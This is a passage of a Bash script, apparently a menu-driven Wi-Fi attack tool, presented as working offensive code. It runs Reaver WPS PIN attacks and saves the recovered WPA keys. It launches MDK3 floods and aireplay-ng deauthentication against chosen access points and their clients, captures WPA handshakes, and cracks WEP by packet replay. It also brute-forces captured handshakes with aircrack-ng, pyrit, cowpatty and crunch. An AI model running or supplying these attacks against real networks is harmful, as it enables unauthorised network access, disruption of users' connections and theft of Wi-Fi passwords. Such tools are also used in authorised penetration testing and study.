  674.  
  675. if [[ $PinOption == "4" ]]; then
  676.    clear
  677.    echo $RED"Reaver Attack Command:"$STAND
  678.    echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $PIN4REAVER -d 2 -t 2 -T 2 -vv"
  679.    echo ""
  680.    read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  681.    clear
  682.    reaver -i mon0 -c $AP_channel -b $AP_bssid -p $PIN4REAVER -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  683.    rm reaver.txt
  684.    echo ""
  685.    fi ;;
  686.  
  687. 2)
  688. clear
  689. echo $RED"Current Reaver Attack Command:"$STAND
  690. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions"
  691. echo ""
  692. read -p $GREEN"Please input any additional reaver options (eg: -vv):$STAND " ReaverOptions
  693. echo ""
  694. echo $RED"New Reaver Attack Command:"$STAND
  695. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions"
  696. echo ""
  697. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  698. reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  699. rm reaver.txt
  700.  
  701. ################## START OF: MDK3 ACCESS POINT RESET ############################################
  702.  
  703. echo ""
  704. echo ""
  705. echo $GREEN"Would you like to try to reset the access point? Y/n"$STAND
  706. read a
  707. if [[ $a == "Y" || $a == "y" || $a = "" ]]; then
  708.  
  709.    echo "Press the [Enter] button 3 times on the kismet screen, wait 5-10 seconds then press Ctrl+c."
  710.    kismet ncsource=mon0:hop=true
  711.    sleep 5
  712.  
  713.    echo ""
  714.    echo $RED"Target essid:$STAND $AP_essid"
  715.    echo ""
  716.    read -p $GREEN"Please input the above target essid.$STAND" MDK3_Target
  717.    echo ""
  718.    cat $HOME/scrypta/temp/*.nettxt | sed -n "/$MDK3_Target/,/Channel/p"
  719.  
  720.    echo 'AP_bssid="'"$AP_bssid"'"' > MDK3_APbssid.txt
  721.    sleep 1
  722.    echo 'AP_channel="'"$AP_channel"'"' > MDK3_APchannel.txt
  723.    sleep 1
  724.    cat MDK3_APbssid.txt | sed 's/AP_bssid=//' | sed 's/"//g' > MDK3_APbssid_1.txt
  725.    sleep 1
  726.    cat MDK3_APchannel.txt | sed 's/AP_channel=//' | sed 's/"//g' > MDK3_APchannel_1.txt
  727.    sleep 1
  728.    echo $AP_bssid > Blacklist.txt
  729.  
  730.    echo ""
  731.    echo $GREEN"Does the access point support WAP+TKIP?"
  732.    echo $GREEN"[1]$BLUE = Yes."
  733.    echo $GREEN"[2]$BLUE = No."
  734.    echo $GREEN"1 or 2?"$STAND
  735.    read option
  736.  
  737.    if [[ $option == "1" ]]; then
  738.  
  739.       read -s -n1 -p $GREEN"Would you like to scan for clients connected to the target access point? Y/n:$STAND  " ClientScan
  740.  
  741.       if [[ $ClientScan == "Y" || $ClientScan == "y" ]]; then
  742.          xterm -geometry 111x24+650+0 -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
  743.          echo ""
  744.          echo ""
  745.       fi
  746.  
  747.       echo $GREEN"Did the access point have any clients connected to it?"
  748.       echo $GREEN"[1]$BLUE = Yes."
  749.       echo $GREEN"[2]$BLUE = No."
  750.       echo $GREEN"1 or 2?"$STAND
  751.       read MDK3_ClientChoice
  752.  
  753.       if [[ $MDK3_ClientChoice == "1" ]]; then
  754.  
  755.          echo '#!/bin/bash
  756.  
  757. RED=$(tput setaf 1 && tput bold)
  758. GREEN=$(tput setaf 2 && tput bold)
  759. STAND=$(tput sgr0)
  760.  
  761. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  762. sleep 1
  763. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  764. echo ""
  765. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  766.  
  767.    xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  768.    xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  769.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  770.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 m -t $AP_bssid -j" &
  771.  
  772. while :
  773. do
  774.    xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  775.    sleep 20
  776.    kill `pidof airodump-ng`
  777. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  778.  
  779.       fi
  780.  
  781.       if [[ $MDK3_ClientChoice == "2" ]]; then
  782.  
  783.          echo '#!/bin/bash
  784.  
  785. RED=$(tput setaf 1 && tput bold)
  786. GREEN=$(tput setaf 2 && tput bold)
  787. STAND=$(tput sgr0)
  788.  
  789. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  790. sleep 1
  791. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  792. echo ""
  793. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  794.  
  795.    xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  796.    xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  797.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  798.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 m -t $AP_bssid" &
  799.  
  800. while :
  801. do
  802.    xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  803.    sleep 20
  804.    kill `pidof airodump-ng`
  805. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  806.  
  807.       fi
  808.       fi
  809.  
  810.    if [[ $option == "2" ]]; then
  811.  
  812.    echo '#!/bin/bash
  813.  
  814. RED=$(tput setaf 1 && tput bold)
  815. GREEN=$(tput setaf 2 && tput bold)
  816. STAND=$(tput sgr0)
  817.  
  818. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  819. sleep 1
  820. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  821. echo ""
  822. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  823.  
  824.    xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  825.    xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  826.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  827.  
  828. while :
  829. do
  830.    xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  831.    sleep 20
  832.    kill `pidof airodump-ng`
  833. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  834.  
  835.    fi
  836.  
  837.    sleep 1
  838.    chmod +x $HOME/scrypta/temp/MDK3_AP_Reset.sh
  839.    sleep 1
  840.    Eterm -g 100x10-640-500 --cmod "red" -T "Main Window - Press Ctrl+c to exit MDK3" -e sh -c "$HOME/scrypta/temp/MDK3_AP_Reset.sh; bash"
  841.    rm $HOME/scrypta/temp/Blacklist.txt
  842.  
  843. if [[ $a == "N" || $a == "n" ]]; then
  844.    echo ""
  845. fi
  846. fi
  847. ################## END OF: MDK3 ACCESS POINT RESET ############################################
  848.  
  849. echo "" ;;
  850. 0) exit 0;;
  851. *) echo "";
  852. echo "Press [Enter] to continue. . ." ; read ;;
  853. esac
  854.  
  855. ############## End Of Reaver Attacks And Store Recovered Passkey ##############
  856.  
  857. ######################## LOOP ############################################
  858.  
  859. clear
  860. read -s -n1 -p $RED"Choose another target or return to the main menu:$GREEN
  861. y $BLUE= Choose another target.$GREEN
  862. n $BLUE= Return to main menu.$GREEN
  863. Please choose y/n?$STAND: " CONFIRM
  864. case $CONFIRM in
  865. n|N|NO|no|No)
  866. break ;;
  867. *) echo "" ;;
  868. esac
  869. done
  870.  
  871. ############## End Of Loop Section ##############
  872.  
  873. ############## Start Of Cleanup ##############
  874.  
  875. rm *.txt
  876. rm *.py
  877. cd
  878. ############## End Of Cleanup ##############
  879. ;;
  880.  
  881. ###### [4] Capture WPA/WPA2 Handshake ######
  882. 4)
  883. cd $HOME/scrypta/temp
  884. clear
  885. echo $RED"Scan for possible targets."
  886. echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."
  887. read -p $GREEN"Press [Enter] to start the scan.$STAND"
  888.  
  889. xterm -geometry 111x35+650+0 -l -lf WPA_Scan.txt -e airodump-ng --encrypt WPA mon0
  890.  
  891. tac WPA_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | grep "PSK" | sed -r -e 's/\./ /' | sed '/<length:  0>/d' > temp0.txt
  892. cat temp0.txt | sed 's/^..........................................................................//' | nl -ba -w 1  -s ':  ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt
  893. sleep 1
  894.  
  895. PresentedAPs=$(cat PresentedAPs.txt)
  896. sleep 1
  897. echo ""
  898. echo "Please choose an AP"
  899. echo ""
  900. echo "$PresentedAPs"
  901. echo ""
  902. read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_AP
  903. echo ""
  904.  
  905. Chosen_AP_Details=$(cat temp0.txt | sed -n ""$Chosen_AP"p")
  906. AP_essid=`echo "$Chosen_AP_Details" | awk '{ print $11 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  907. AP_bssid=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  908. AP_channel=`echo "$Chosen_AP_Details" | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  909.  
  910. clear
  911. echo $RED"Chosen Target Details."$STAND
  912. echo $RED"Aceess Point essid$STAND: $AP_essid"
  913. echo $RED"Aceess Point bssid$STAND: $AP_bssid"
  914. echo $RED"Aceess Point Channel Number$STAND: $AP_channel"
  915.  
  916. echo ""
  917. echo $RED"Scan for clients connected to$STAND $AP_essid"
  918. echo $RED"Once you have identified the client you wish to target press Ctrl-C to exit"$STAND
  919. read -p $GREEN"Press [Enter] to start the scan."$STAND
  920.  
  921. xterm -geometry 100x20+650+0 -l -lf WPA_ClientScan.txt -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
  922.  
  923. while true
  924. do
  925.  
  926. tac WPA_ClientScan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -r -e 's/\./ /' | sed '$d' | sed '1,6d' | awk '{ print $2 }' > temp1.txt
  927. cat temp1.txt | nl -ba -w 1  -s ': ' > ConnectedClientsScan.txt
  928. ConnectedClientsScan=$(cat ConnectedClientsScan.txt)
  929.  
  930. sleep 2
  931. echo ""
  932. echo $RED"Please choose a client MAC address"$STAND
  933. echo ""
  934. echo "$ConnectedClientsScan"
  935. echo ""
  936. read -p $GREEN"Please input the number of your chosen client MAC address:$STAND " Chosen_Client
  937. echo ""
  938.  
  939. sleep 1
  940. Chosen_Client_MAC=$(cat temp1.txt | sed -n ""$Chosen_Client"p")
  941. echo ""
  942. echo $RED"Chosen Client MAC Address."$STAND
  943. echo "$Chosen_Client_MAC"
  944. echo ""
  945.  
  946. xterm -geometry 100x20+675+0 -e "airodump-ng -c $AP_channel --ignore-negative-one -w psk --bssid $AP_bssid mon0" &
  947.  
  948. echo $RED"Choose an option:"
  949. echo $GREEN"[1]$BLUE = De-Authenticate The Chosen Client?."
  950. echo $GREEN"[2]$BLUE = De-Authenticate All Connected Clients?."
  951. echo $GREEN"[3]$BLUE = Choose another client."
  952. echo $GREEN"1, 2, or 3?"$STAND
  953. read option
  954.  
  955. if [[ $option == "1" ]]; then
  956.        echo "De-Authenticate a single client."
  957.        xterm -geometry 100x20+675+350 -e  "aireplay-ng -0 10 --ignore-negative-one -a $AP_bssid -c $Chosen_Client_MAC mon0"
  958.        fi
  959. if [[ $option == "2" ]]; then
  960.        echo "De-Authenticate all connected clients."
  961.        xterm -geometry 100x20+675+350 -e  "aireplay-ng -0 10 --ignore-negative-one -a $AP_bssid mon0"
  962.        fi
  963. if [[ $option == "3" ]]; then
  964.        clear
  965. echo "Please choose a client"
  966.        echo ""
  967.        echo "$ConnectedClientsScan"
  968.        echo ""
  969.        read -p $GREEN"Please input the number of the chosen client:$STAND " Chosen_Client
  970.        echo ""
  971.        Chosen_Client_MAC=$(cat temp1.txt | sed -n ""$Chosen_Client"p")
  972.        echo ""
  973.        echo "Chosen Target Details."
  974.        echo "$Chosen_Client_MAC"
  975.        sleep 4
  976.        fi
  977.  
  978. clear
  979. echo -n $GREEN"Re-send de-auth request or choose another client? (y or n)$STAND: "
  980. read -e CONFIRM
  981. case $CONFIRM in
  982. n|N|NO|no|No)
  983. break ;;
  984. *) echo "" ;;
  985. esac
  986. done
  987.  
  988. rm WPA_Scan.txt
  989. rm temp0.txt
  990. rm PresentedAPs.txt
  991.  
  992. rm WPA_ClientScan.txt
  993. rm temp1.txt
  994. rm ConnectedClientsScan.txt
  995.  
  996. kill `pidof airodump-ng`
  997. rm *.csv
  998. rm *.netxml
  999. mv *.cap $HOME/scrypta/Captured_Handshakes/$AP_essid.cap
  1000. cd
  1001. ;;
  1002.  
  1003. ###### [5] WEP Attacks ######
  1004. 5)
  1005. cd $HOME/scrypta/temp
  1006. clear
  1007. echo $RED"Scan for possible targets."$STAND
  1008. echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."$STAND
  1009. read -p $GREEN"Press [Enter] to start the scan.$STAND"
  1010.  
  1011. xterm -geometry 111x35+650+0 -l -lf WEP_Scan.txt -e airodump-ng --encrypt WEP mon0
  1012.  
  1013. sleep 1
  1014. tac WEP_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | sed '1,2d' | sed '$d' | sed '/<length:  0>/d' > temp0.txt
  1015. sleep 1
  1016. PresentedAPs=$(cat temp0.txt | awk '{ print $10 }' | nl -ba -w 1  -s ':  ' | sed 's/^[ \t]*//;s/[ \t]*$//' )
  1017.  
  1018. clear
  1019. echo $RED"Please choose a target"$STAND
  1020. echo ""
  1021. echo "$PresentedAPs"
  1022. echo ""
  1023. read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_AP
  1024. echo ""
  1025.  
  1026. Chosen_AP_Details=$(cat temp0.txt | sed -n ""$Chosen_AP"p")
  1027. AP_essid=`echo "$Chosen_AP_Details" | awk '{ print $10 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  1028. AP_bssid=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  1029. AP_channel=`echo "$Chosen_AP_Details" | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  1030.  
  1031. clear
  1032. echo $RED"Chosen Target Details."$STAND
  1033. echo $RED"Aceess Point essid$STAND: $AP_essid"
  1034. echo $RED"Aceess Point bssid$STAND: $AP_bssid"
  1035. echo $RED"Aceess Point Channel Number$STAND: $AP_channel"
  1036. echo ""
  1037. echo $RED"Scan for clients connected to$STAND $AP_essid."
  1038. echo $RED"When you've identified a target press Ctrl-C to exit.$STAND"
  1039. read -p $GREEN"Press [Enter] to start the scan."$STAND
  1040.  
  1041. sleep 1
  1042. xterm -geometry 111x35+650+0 -l -lf WEP_ClientScan.txt -e airodump-ng -c $AP_channel --bssid $AP_bssid mon0
  1043.  
  1044. echo ""
  1045. echo $GREEN"Did the access point have any clients connected to it?. (y/n)$STAND"
  1046. read answer
  1047.  
  1048. if [[ $answer == "y" || $answer == "Y" ]]; then
  1049.  
  1050.        tac WEP_ClientScan.txt | grep 'STATION' -m 1 -B 9999 | tac | awk '{ print $2 }' | sed '1,2d' | sed '$d' > ClientScan.txt
  1051.        sleep 2
  1052.        PresentedClients=$(cat ClientScan.txt | awk '{ print $1 }' | nl -ba -w 1  -s ':  ' | sed 's/^[ \t]*//;s/[ \t]*$//')
  1053.        
  1054.        sleep 2
  1055.        clear
  1056.        echo "Please choose a client"
  1057.        echo ""
  1058.        echo "$PresentedClients"
  1059.        echo ""
  1060.        
  1061.        read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_Client
  1062.        echo ""
  1063.  
  1064.        Chosen_ClientMAC=$(cat ClientScan.txt | sed -n ""$Chosen_Client"p")
  1065.        ClientMAC=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  1066.  
  1067.        echo $RED"You've chosen:"
  1068.        echo $RED"Client$STAND: $ClientMAC"
  1069.        echo ""
  1070.        
  1071.        while true
  1072.        do
  1073.  
  1074.        read -p $GREEN"Press [Enter] to start the attack.$STAND"
  1075.        xterm -e "airodump-ng -w capture --bssid $AP_bssid -c $AP_channel mon0" &
  1076.        xterm -e "sleep 1 && aireplay-ng -1 0 -e $AP_essid -a $AP_bssid -h $ClientMAC --ignore-negative-one mon0" &
  1077.        xterm -e "sleep 1 && aireplay-ng -3 -b $AP_bssid -h $ClientMAC --ignore-negative-one mon0" &
  1078.        echo $RED"NOTE: There's a 60 second delay before Aircrack-ng starts the cracking process."
  1079.        echo "Please wait for aircrack to start...$STAND"
  1080.        sleep 60
  1081.        aircrack-ng -b $AP_bssid *.cap -l WEPpasskey.txt
  1082.        sleep 2
  1083.        passkey=$(cat WEPpasskey.txt)
  1084.        sleep 2
  1085.        kill `pidof xterm`
  1086.        echo ""
  1087.        echo $RED"Target essid$STAND: $AP_essid"
  1088.        echo $RED"Target bssid$STAND: $AP_bssid"
  1089.        echo $RED"Target Pass-Key$STAND: $passkey"
  1090.  
  1091.        echo -n $GREEN"Was the attack successful? (y or n)$STAND: "
  1092.        read -e CONFIRM
  1093.        case $CONFIRM in
  1094.        y|Y|YES|yes|Yes)
  1095.        break ;;
  1096.        *) echo $RED"Please re-enter information$STAND" ;;
  1097.        esac
  1098.        done
  1099.  
  1100.        echo AP ESSID: $AP_essid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1101.        echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1102.        echo WEP Passkey: $passkey >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1103.        echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1104.        cd
  1105.        fi
  1106. if [[ $answer == "n" || $answer == "N" ]]; then
  1107.        while true
  1108.        do
  1109.  
  1110.        echo $RED"Starting packet capture, press Ctrl+c to end it"$STAND
  1111.        xterm -geometry 100x20+675+0 -e "airodump-ng -c $AP_channel --bssid $AP_bssid --ivs -w capture mon0" & AIRODUMPPID=$!
  1112.        sleep 2
  1113.        aireplay-ng -1 0 -a $AP_bssid -h $mon0mac --ignore-negative-one mon0
  1114.        sleep 2
  1115.        aireplay-ng -5 -b $AP_bssid -h $mon0mac --ignore-negative-one mon0
  1116.        sleep 2
  1117.        packetforge-ng -0 -a $AP_bssid -h $mon0mac -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet mon0
  1118.        sleep 2
  1119.        xterm -geometry 100x20+675+100 -e "aireplay-ng -2 -r arp-packet --ignore-negative-one mon0" & AIREPLAYPID=$!
  1120.        sleep 2
  1121.  
  1122.        echo ""
  1123.        echo $GREEN"Attempt to crack the passkey if the data increases, Is the data increasing?. (y/n)$STAND"
  1124.        read option
  1125.        
  1126.        if [[ $option == "y" ]]; then
  1127.               aircrack-ng -n 128 -b $AP_bssid *.ivs -l WEPpasskey.txt
  1128.               passkey=$(cat WEPpasskey.txt)
  1129.               rm WEPpasskey.txt
  1130.               kill ${AIRODUMPPID}
  1131.               kill ${AIREPLAYPID}
  1132.               rm *.ivs
  1133.               rm *.cap
  1134.               rm *.xor
  1135.               rm arp-packet
  1136.               echo AP ESSID: $AP_essid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1137.               echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1138.               echo WEP Passkey: $passkey >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1139.               echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1140.               fi
  1141.  
  1142.        echo -n $GREEN"Was the attack successful? (y or n)$STAND: "
  1143.        read -e CONFIRM
  1144.        case $CONFIRM in
  1145.        y|Y|YES|yes|Yes)
  1146.        break ;;
  1147.        *) echo ""
  1148.        esac
  1149.        done
  1150.        fi
  1151.        cd
  1152. ;;
  1153.  
  1154. ###### [6] Attack Handshake.cap Files ######
  1155. 6)
  1156. clear
  1157. echo $RED"###################################"
  1158. echo "#                                 #"
  1159. echo "#         With a wordlist         #"
  1160. echo "# $GREEN[1]$BLUE = Aircrack-ng               $RED#"
  1161. echo "# $GREEN[2]$BLUE = Pyrit                     $RED#"
  1162. echo "# $GREEN[3]$BLUE = Pyrit + Cowpatty          $RED#"
  1163. echo "#                                 #"
  1164. echo "#       Without a wordlist        #"
  1165. echo "# $GREEN[4]$BLUE = Crunch + Aircrack-ng      $RED#"
  1166. echo "# $GREEN[5]$BLUE = Crunch + Pyrit            $RED#"
  1167. echo "# $GREEN[6]$BLUE = Crunch + Pyrit + Cowpatty $RED#"
  1168. echo "#                                 #"
  1169. echo "###################################"
  1170. echo
  1171. echo $GREEN"Choose an option?"$STAND
  1172. read option
  1173. if [[ $option == "1" ]]; then
  1174.    clear
  1175.    echo $RED
  1176.    echo "############################################"
  1177.    echo "#                                          #"
  1178.    echo "#$STAND   Attack Capture File Using A Wordlist   $RED#"
  1179.    echo "#$STAND              (Aircrack-ng)               $RED#"
  1180.    echo "#                                          #"
  1181.    echo "############################################"
  1182.    echo
  1183.    echo $RED"eg: /root/Desktop/sky12345.cap"
  1184.    read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  1185.    echo
  1186.    echo $RED"eg: /root/Desktop/wordlist.txt"
  1187.    read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
  1188.    clear
  1189.    # Chosen user input options
  1190.    ############################
  1191.    echo
  1192.    echo $RED"You've chosen:"
  1193.    echo "=============="
  1194.    echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  1195.    echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
  1196.    echo
  1197.    echo $RED"Commands to launch:"
  1198.    echo "==================="
  1199.    echo $STAND"aircrack-ng -w $WordlistNameLocation $CapNameLocation"
  1200.    echo
  1201.    # Launch chosen commands/options
  1202.    #################################
  1203.    read -p $GREEN"Press enter to start"$STAND
  1204.    clear
  1205.    aircrack-ng -w $WordlistNameLocation $CapNameLocation
  1206.    fi
  1207. if [[ $option == "2" ]]; then
  1208.    clear
  1209.    echo $RED
  1210.    echo "############################################"
  1211.    echo "#                                          #"
  1212.    echo "#$STAND   Attack Capture File Using A Wordlist   $RED#"
  1213.    echo "#$STAND                 (Pyrit)                  $RED#"
  1214.    echo "#                                          #"
  1215.    echo "############################################"
  1216. echo
  1217. echo $RED"eg: 00:11:22:33:44:55"
  1218. read -p $GREEN"Access Point bssid$STAND: " bssid
  1219. echo
  1220. echo $RED"eg: /root/Desktop/sky12345.cap"
  1221. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  1222. echo
  1223. echo $RED"eg: /root/Desktop/wordlist.txt"
  1224. read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
  1225. clear
  1226. # Chosen user input options
  1227. ############################
  1228. echo
  1229. echo $RED"You've chosen:"
  1230. echo "=============="
  1231. echo $RED"Access Point bssid$STAND: $bssid"
  1232. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  1233. echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
  1234. echo
  1235. echo $RED"Commands to launch:"
  1236. echo "==================="
  1237. echo $STAND"pyrit -r $CapNameLocation -i $WordlistNameLocation -b $bssid attack_passthrough"
  1238. echo
  1239. # Launch chosen commands/options
  1240. #################################
  1241. read -p $GREEN"Press enter to start"$STAND
  1242. clear
  1243. pyrit -r $CapNameLocation -i $WordlistNameLocation -b $bssid attack_passthrough
  1244.                  fi
  1245.                  if [[ $option == "3" ]]; then
  1246.                                   clear
  1247. echo $RED
  1248. echo "############################################################################"
  1249. echo "#                                                                          #"
  1250. echo "#$STAND                   Attack Capture File Using A Wordlist                   $RED#"
  1251. echo "#$STAND                            (Pyrit + Cowpatty)                            $RED#"
  1252. echo "#                                                                          #"
  1253. echo "############################################################################"$STAND
  1254. echo
  1255. echo $RED"eg: sky12345"
  1256. read -p $GREEN"Access Point essid$STAND: " essid
  1257. echo
  1258. echo $RED"eg: /root/Desktop/sky12345.cap"
  1259. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  1260. echo
  1261. echo $RED"eg: /root/Desktop/wordlist.txt"
  1262. read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
  1263. clear
  1264. # Chosen user input options
  1265. ############################
  1266. echo
  1267. echo $RED"You've chosen:"
  1268. echo "=============="
  1269. echo $RED"Access Point essid$STAND: $essid"
  1270. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  1271. echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
  1272. echo
  1273. echo $RED"Commands to launch:"
  1274. echo "==================="
  1275. echo $STAND"cat $WordlistNameLocation | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid"
  1276. echo
  1277. # Launch chosen commands/options
  1278. #################################
  1279. read -p $GREEN"Press enter to start"$STAND
  1280. clear
  1281. cat $WordlistNameLocation | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid
  1282.                  fi
  1283.                  if [[ $option == "4" ]]; then
  1284.                                   lear
  1285. echo $RED
  1286. echo "############################################################################"
  1287. echo "#                                                                          #"
  1288. echo "#$STAND           Attack a Capture file without using a wordlist file            $RED#"
  1289. echo "#$STAND                          (Crunch + Aircrack-ng)                          $RED#"
  1290. echo "#                                                                          #"
  1291. echo "############################################################################"$STAND
  1292. echo
  1293. echo $RED"eg: abcdef23456789"
  1294. read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
  1295. echo
  1296. echo $RED"eg: 10"
  1297. read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
  1298. echo
  1299. echo $RED"eg: 10"
  1300. read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
  1301. echo
  1302. echo $RED"eg:"
  1303. echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
  1304. echo $RED"-s XXXXXXXXXX = Start point."
  1305. read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
  1306. echo
  1307. echo $RED"eg: sky12345"
  1308. read -p $GREEN"Access Point essid$STAND: " essid
  1309. echo
  1310. echo $RED"eg: /root/Desktop/sky12345.cap"
  1311. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  1312. clear
  1313. # Chosen user input options
  1314. ############################
  1315. echo
  1316. echo $RED"You've chosen:"
  1317. echo "=============="
  1318. echo $RED"Minimum length password$STAND: $PasswordLengthMin"
  1319. echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
  1320. echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
  1321. echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
  1322. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  1323. echo $RED"essid$STAND: $essid"
  1324. echo
  1325. echo $RED"Commands to launch:"
  1326. echo "==================="
  1327. echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | aircrack-ng $CapNameLocation -e $essid -w -"
  1328. echo
  1329. # Launch chosen commands/options
  1330. #################################
  1331. read -p $GREEN"Press enter to start"$STAND
  1332. clear
  1333. crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | aircrack-ng $CapNameLocation -e $essid -w -
  1334.                  fi
  1335.                  if [[ $option == "5" ]]; then
  1336.                                   clear
  1337. echo $RED
  1338. echo "############################################################################"
  1339. echo "#                                                                          #"
